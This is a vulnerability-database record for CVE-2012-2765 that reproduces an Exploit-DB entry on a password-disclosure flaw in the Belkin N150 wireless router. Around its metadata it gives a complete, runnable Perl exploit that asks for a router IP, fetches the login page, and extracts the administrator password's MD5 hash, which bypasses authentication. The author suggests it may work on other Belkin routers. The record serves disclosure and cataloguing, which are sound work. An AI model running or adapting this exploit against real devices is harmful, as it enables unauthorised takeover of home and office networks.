ID

VAR-E-201205-0124


CVE

cve_id:CVE-2012-2765

Trust: 1.6

sources: EXPLOIT-DB: 18859 // EDBNET: 41148

EDB ID

18859


TITLE

Belkin N150 Wireless Router - Password Disclosure - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18859

DESCRIPTION

Belkin N150 Wireless Router - Password Disclosure. CVE-73243CVE-2012-2765 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 18859

AFFECTED PRODUCTS

vendor:belkinmodel:n150 wireless routerscope: - version: -

Trust: 1.0

sources: EXPLOIT-DB: 18859

EXPLOIT

============================================
Belkin N150 Wireless MD5 Password Disclosure
============================================

Firmware Version : 1.00.22 (Aug 31 2010 14:36:01)
Boot Version : 1.20
Hardware : F7D1301 v1 (01A)
Author : Avinash Tangirala

======================
Vulnerability Details:
======================

The Router's web interface on default 192.168.2.1 reveals the administrator password in MD5 hash thereby one can bypass the login completely.
There is a similar exploit for Belkin G wireless router by aodrulez. Therefore this exploit might* work possibly on every Belkin router created :D.

=========
Exploit :
=========

#/usr/bin/perl
use strict;
use LWP::Simple;
print "\n 'Belkin N150 Wireless Router' Admin Exploit ";
print "\n ---------------------------------------------\n\n";
print "[+] Enter the Router's IP Address : ";
my $ip=<STDIN>;
chomp($ip);
$ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n";
my @arr=$ip =~ m/var password = "(.*)";/g;
print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n";

==========
Greetz to:
==========

1.) Aodrulez : My Mentor
2.) Arkz
3.) neurotoxIN
4.) www.codeeleven.in

Trust: 1.0

sources: EXPLOIT-DB: 18859

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18859

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18859

TYPE

Password Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 18859

CREDITS

Avinash Tangirala

Trust: 0.6

sources: EXPLOIT-DB: 18859

EXTERNAL IDS

db:NVDid:CVE-2012-2765

Trust: 1.6

db:EXPLOIT-DBid:18859

Trust: 1.6

db:EDBNETid:41148

Trust: 0.6

sources: EXPLOIT-DB: 18859 // EDBNET: 41148

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-2765

Trust: 1.6

url:https://www.exploit-db.com/exploits/18859/

Trust: 0.6

sources: EXPLOIT-DB: 18859 // EDBNET: 41148

SOURCES

db:EXPLOIT-DBid:18859
db:EDBNETid:41148

LAST UPDATE DATE

2022-07-27T09:40:37.155000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:18859date:2012-05-11T00:00:00
db:EDBNETid:41148date:2012-05-11T00:00:00